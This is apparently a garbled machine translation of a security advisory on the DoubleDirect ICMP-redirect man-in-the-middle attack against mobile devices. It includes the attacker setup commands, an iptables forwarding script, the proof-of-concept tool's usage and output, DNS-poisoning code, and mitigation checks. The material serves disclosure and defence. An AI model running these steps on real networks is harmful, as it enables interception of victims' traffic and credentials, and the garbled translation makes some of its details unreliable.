Password refers to DoubleDirect man-in-the-middle attacks on Android and iOS Systems

Password refers to DoubleDirect man-in-the-middle attacks on Android and iOS Systems

Security researchers have discovered a new man-in-the-middle attack technology targeting smartphones and tablets running Android and iOS systems.

This technology, known as DoubleDirect, is a type of man-in-the-middle (MITM) attack. Attackers can use this technology to redirect traffic from victims accessing Google, Facebook, and Twitter to devices controlled by attackers. Once the traffic of victims is redirected, attackers can steal the victim's personal data, such as email ID, logon credential, and bank information. Of course, they can also install trojans and other malware on the victim's machine.

Zimperium, a mobile security company in San Francisco, detailed this threat in its blog.Hackers are using DoubleDirect technology to launch targeted attacks in 31 countries including the United States, Britain, and Canada. The top five Internet giants are Google, Facebook, Hotmail, Live.com, and Twitter.

Full-duplex ICMP redirection man-in-the-middle attack

ICMP attacks are a type of MITM attacks. Traditional ICMP redirection attacks and their exploitation tools are similar to ettercap + half-duplex MITM attacks ). The victim is spoofed because of ICMP redirection attacks, and the router is poisoned because of ARP spoofing attacks. This type of ICMP attack can be easily defended by traditional measures to defend against ARP attacks.

DoubleDirect is different. It uses ICMP (inter-network control packet Protocol) to redirect data packets to change the host route table. The ICMP redirection packet will tell the host that there is a better route path to reach the destination. Changing the route table on the victim machine allows arbitrary network traffic to flow to a specific IP address (for example, the attacker's IP address), and then the attacker can initiate a man-in-the-middle attack. After traffic is redirected, attackers can exploit the Client Vulnerability to attack the victim's device to access the victim's network.

By studying DoubleDirect attacks, we find that attackers have implemented full-duplex ICMP redirection man-in-the-middle attacks using unknown technologies.Traditional ICMP redirection attacks have half-duplex restrictions.

 

How does a DoubleDirect attack work?

 

After studying the attack, Zimperium mobile security lab has created an attack testing tool that can prove the possibility of launching a full-duplex ICMP redirection attack. The difficulty of ICMP redirection attacks is that the attacker must know the IP address that the victim can reach in advance.

How can Attackers know the IP addresses accessible to victims? To answer this question, we should first analyze the victim's device.

For example, when we enter www.zimperium.com in a browser, the application sends a DNS request to find the IP address of the host www.zimperium.com.

First, we will use ICMP redirection packets to forward all DNS traffic on the victim's device to our device. Most of the time, we can predict the DNS servers used by victims.

If the victim and us are in the same LAN, the DNS server of the victim may also be the same as the DNS server we obtained through DHCP (Dynamic Host Configuration Protocol. Of course, some mobile devices use the default DNS server (8.8.8.8 or 8.8.4.4 ).

We also provide a simple and effective tool to study DoubleDirect. Click here to download it.

To compile and run this tool, you need to install libcrafter (https://code.google.com/p/libcrafter/) on the system ). Libcrafter is a cross-platform library developed by C ++. It can be used to capture packets and unpack packets. To compile on GNU/linux or mac OS X, run the following command:

$ git clone https://github.com/pellegre/libcrafter$ cd libcrafter/libcrafter$ ./autogen.sh$ make$ sudo make install$ sudo ldconfig

It is worth noting that you need to install the packet capture tool libpcap before configuring libcrafter:

 

#apt-get install libpcap-dev

DoubleDirect instance: full-duplex ICMP redirection attack

Scenario Reproduction

Gateway = 192.168.1.1

Attacker (Ubuntu) = 192.168.1.105

Victim machine (GalaxyS4) = 192.168.1.101

Victim Configuration

First, check whether the device supports redirection. GalaxyS4 supports redirection by default:

# cat /proc/sys/net/ipv4/conf/all/accept_redirects 1

Second, if your device does not support ICMP redirection but you want to test the attack, run the following command:

# echo 1 > /proc/sys/net/ipv4/conf/all/accept_redirects

 

Attack Host Configuration

To ensure proper attack, we need to execute some commands on the attacker's device:

Forward data traffic (this method is temporary, and it becomes invalid upon restart. To maintain forwarding for a long time, you need to modify/etc/sysctl. conf)

# echo 1 > /proc/sys/net/ipv4/ip_forward

Disable the redirection settings of the attacker. This is important! We need to tell the kernel of the attack device not to send redirection

# echo 0 > /proc/sys/net/ipv4/conf/all/send_redirect

Attack demonstration

Compile the DoubleDirect_poc.cpp file:

$ g++ doubledirect_poc.cpp -o doubledirect_poc -lcrafter$ ./doubledirect_poc[#] ***** ZIMPERIUM - DoubleDirect :: Full-Duplex ICMP Redirect Audit Tool *****[#] Usage: ./doubledirect_poc [options]

POC options:
-I: Network Interface
-V affected machine IP Address
-D target IP address of the drug

When a victim accesses some URLs, We will poison a remote IP address accessible to the victim's machine, instead of performing lan arp spoofing. Then we let the victim's traffic go to our device instead of the real gateway.

When the device sends an IP packet destined for 8.8.8.8, it should have passed through the gateway (192.168.1.1 )......

Run the following command on the attacker's device:

$ sudo ./doubledirect_poc -i wlan0 -v 192.168.1.101 -d 8.8.8.8[#] Attack parameters :[+] Interface : wlan0[+] Victim IP address : 192.168.1.101[+] Destination to poison : 8.8.8.8[#] Gateway parameters :[+] Gateway IP address : 192.168.1.1[+] Gateway MAC address : *:*:*:*:AE:51[#] My parameters :[+] My IP address : 192.168.1.105

From the above demonstration, we can see how we poisoned 8.8.8.8 for our IP192.168.1.105. When the victim sends a data packet destined for 8.8.8.8, it uses our device as the gateway so that we can sniff all the traffic to the destination.

Once all the DNS traffic is forwarded through our computer, we get the IP address through the DNS response packet and can send ICMP redirection packets to these IP addresses. In this way, we can not only sniff all the DNS traffic of the victim, but also completely forward it to our device.

Test whether you are vulnerable to DoubleDirect attacks. We can write a bash script to use iptables for IP forwarding:

# cat iptables_dobule_direct.sh#!/bin/shif [ $# -lt 1 ]; thenecho "[@] Usage: `basename ${0}` "echo "[@] Example: `basename ${0}` wlan0"exit 0fiINTERFACE=${1}echo 1 > /proc/sys/net/ipv4/ip_forwardecho 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirectsiptables --flushiptables --zeroiptables --delete-chainiptables -F -t natiptables --append FORWARD --in-interface $INTERFACE --jump ACCEPTiptables --table nat --append POSTROUTING --out-interface $INTERFACE --jump MASQUERADE# ./iptables_double_direct.sh wlan0

Finally, run the Zimperium DoubleDirect attack test tool:

# ./doubledirect_poc -i wlan0 -v 192.168.1.101[#] ***** ZIMPERIUM - DoubleDirect :: Full-Duplex ICMP Redirect Audit Tool *****[#] Attack parameters :[+] Interface : wlan0[+] Victim IP address : 192.168.1.101[#] Gateway parameters :[+] Gateway IP address : 192.168.2.1[+] Gateway MAC address : 00:1f:*:*:*:*[#] My parameters :[+] My IP address : 192.168.2.103

The DNS server is hardcoded into the code (line 2, DoubleDirect_poc.cpp file.

// Hardcoded DNS servers we want to redirect to our machinestartIcmpRedirectAttack(*redirect_parameters, getGatewayIp(redirect_parameters->_interface)); // GatewaystartIcmpRedirectAttack(*redirect_parameters, "8.8.8.8");startIcmpRedirectAttack(*redirect_parameters, "8.8.4.4");startIcmpRedirectAttack(*redirect_parameters, "208.67.222.222");startIcmpRedirectAttack(*redirect_parameters, "208.67.220.220");

Response Policy

 

Android, IOS, and Mac OSX devices usually support ICMP redirection by default.

 

To determine whether your OS X device is vulnerable to DoubleDirect attacks, run the following command:

sysctl net.inet.ip.redirect | grep ": 1" && echo "DoubleDirect: VULNERABLE" || echo "DoubleDirect: SAFE"

To Disable ICMP redirection on Mac, run the following command (Root permission required ):

# sysctl -w net.inet.ip.redirect=0

Note: This fix is not persistent. To make it valid for a long time, you can add a STARTUP script in the command line after restarting.

For Android, most Android devices support redirection by default. To disable it, you need the root device and run the following command:

# echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects

Which devices will be attacked?

 

Affected systems include

 

Android devices: most Android devices, including Nexus 5 + LollipopiOS devices: The latest iOS devices, including Mac: Mac OS X Yosemite outside iOS 8.1.1)

Most Windows and GNU/Linux users are not attacked by DoubleDirect because these operating systems do not support ICMP redirection packets.